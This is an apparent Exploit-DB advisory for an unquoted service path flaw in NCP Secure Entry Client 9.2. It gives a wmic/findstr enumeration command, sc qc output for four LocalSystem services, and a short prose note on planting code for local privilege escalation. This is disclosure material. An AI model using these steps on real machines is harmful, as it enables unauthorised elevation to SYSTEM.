NCP_Secure_Entry_Client 9.2 – Unquoted Service Paths

• Exploit Database
• 33 阅读

• 作者： Akif Mohamed Ik
  日期： 2019-11-18
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47668/

• # Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
  # Date: 2019-11-17
  # Exploit Author: Akif Mohamed Ik
  # Vendor Homepage: http://software.ncp-e.com/
  # Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
  # Version: 9.2x
  # Tested on: Windows 7 SP1
  # CVE : NA
  C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
  
  ncprwsntncprwsnt
  C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
   Auto
  rwsrsurwsrsu
  C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
   Auto
  ncpclcfgncpclcfg
  C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
   Auto
  NcpSecNcpSec
  C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
   Auto
  						 
  C:\Users\ADMIN>sc qc ncprwsnt					 
  [SC] QueryServiceConfig SUCCESS	
  		SERVICE_NAME: ncprwsnt
  TYPE : 10WIN32_OWN_PROCESS
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : ncprwsnt
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  
  C:\Users\ADMIN>sc qc rwsrsu
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME : rwsrsu
  TYPE : 110WIN32_OWN_PROCESS (interactive)
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : rwsrsu
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  		
  C:\Users\ADMIN>sc qc ncpclcfg
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME : ncpclcfg
  TYPE : 110WIN32_OWN_PROCESS (interactive)
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : ncpclcfg
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem		
  		
  C:\Users\ADMIN>sc qc NcpSec
  [SC] QueryServiceConfig SUCCESS
  
  SERVICE_NAME : NcpSec
  TYPE : 110WIN32_OWN_PROCESS (interactive)
  START_TYPE : 2 AUTO_START
  ERROR_CONTROL: 1 NORMAL
  BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
  LOAD_ORDER_GROUP :
  TAG: 0
  DISPLAY_NAME : NcpSec
  DEPENDENCIES :
  SERVICE_START_NAME : LocalSystem
  		
  #Exploit:
  
  A successful attempt would require the local user to be able to insert
  their code in the system root path undetected by the OS or other
  security applications where it could potentially be executed during
  application startup or reboot. If successful, the local user's code
  would execute with the elevated privileges of the application.